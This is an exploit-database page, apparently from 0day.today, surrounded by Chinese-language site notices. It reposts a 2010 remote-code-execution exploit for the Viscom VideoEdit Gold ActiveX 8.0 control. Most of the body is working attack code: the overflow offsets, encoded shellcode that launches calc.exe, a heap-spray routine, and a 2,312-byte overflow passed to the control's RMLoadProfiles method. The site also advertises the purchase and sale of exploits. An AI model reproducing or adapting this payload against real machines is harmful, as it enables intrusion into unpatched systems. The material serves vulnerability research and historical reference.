0day.today －世界最大的漏洞利用数据库。

选择语言:

0day.today 用户须知:

我们唯一的域名：http://0day.today
我们大多数的材料都完全免费
如果你想购买漏洞利用 / 获取V.I.P.权限或者使用其他付费服务，
你需要购买或者赢取金币金币

We accept currencies: [contact admin to find more]

我们不希望本站被用于黑客用途。一经查实用户有任何形式的非法访问行为，此用户的账户和数据会被从本站删除。

本站管理员使用官方账号。请谨防诈骗！

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

我已经是 0day.today 注册用户。不要再显示此信息。

进站须知

请读 [ 协议 ]
请读 [ 提交 ] 规则
请访问 [ 常见问题 ] 页
[ 注册 ] 用户信息
获取 [ 金币 ]
如果你想要 [ 出售 ]
如果你想要 [ 购买 ]
如果你丢失了 [ 账户 ]
如有任何问题 [ [email protected] ]

主链接

你可以由此方式联系我们

Mail:

[email protected]

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ 授权 ] [ 注册 ] [ 恢复账号 ]

你可以由此方式联系我们:

Mail:

[email protected]

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Viscom VideoEdit Gold ActiveX 8.0 Remote Code Execution Exploit

作者

Rew

风险

[

安全风险级别－未分类

]

0day-ID

类别

添加日期

平台

===============================================================
Viscom VideoEdit Gold ActiveX 8.0 Remote Code Execution Exploit
===============================================================

<!--
  
Title: Viscom VideoEdit Gold ActiveX 8.0 Remote Code Execution Exploit
Date: Dec 5, 2010
Author: Rew
Email: rew [splat] leethax.info
Link: http://www.viscomsoft.com/products/videoeditgold/index.html
Version: 8.0.0.0
Tested on: WinXP - IE 6
CVE: NA (0day)
  
Impact is relatively low due to object not marked safe for scripting.  You'll
need to change the default IE settings to let it run.
 
This is a plain vanilla stack overflow.  The file is...
"%PROGRAMFILES%\VideoEdit Gold ActiveX Control\VideoEdit.ocx"
I'm not using the SEH but here's the offsets just for kicks if you're interested.
 
[2311 junk] [ebp] [eip] [284 junk] [nseh] [seh]
  
-->
 
<object classid='clsid:57D9AF4C-23BA-47EC-A40B-2DA79641B285' id='target' /></object>
 
<script>
 
// Ctrl+C Ctrl+V, herpderp
 
// calc.exe
var shellcode = unescape(
    '%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
    '%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
    '%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
    '%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
    '%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
    '%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
    '%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
    '%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e'
);
 
var nops = unescape('%u9090%u9090');
 
var headersize = 20;
var slackspace = headersize + shellcode.length;
 
while(nops.length < slackspace) {
    nops += nops;
}
 
var fillblock = nops.substring(0, slackspace);
var block = nops.substring(0, nops.length - slackspace);
 
while((block.length + slackspace) < 0x50000) {
    block = block + block + fillblock;
}
 
memory=new Array();
for(counter=0; counter<200; counter++){
    memory[counter] = block + shellcode;
}
 
var bof = '';
while(bof.length < 2312){
    bof += 'A';
}
bof += 'BBBB'; // EBP
bof += "\x0c\x0c\x0c\x0c"; // EIP
 
document.getElementById('target').RMLoadProfiles( bof );
 
</script>



#  0day.today [2024-07-02]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Viscom VideoEdit Gold ActiveX 8.0 Remote Code Execution Exploit

报告错误

报告错误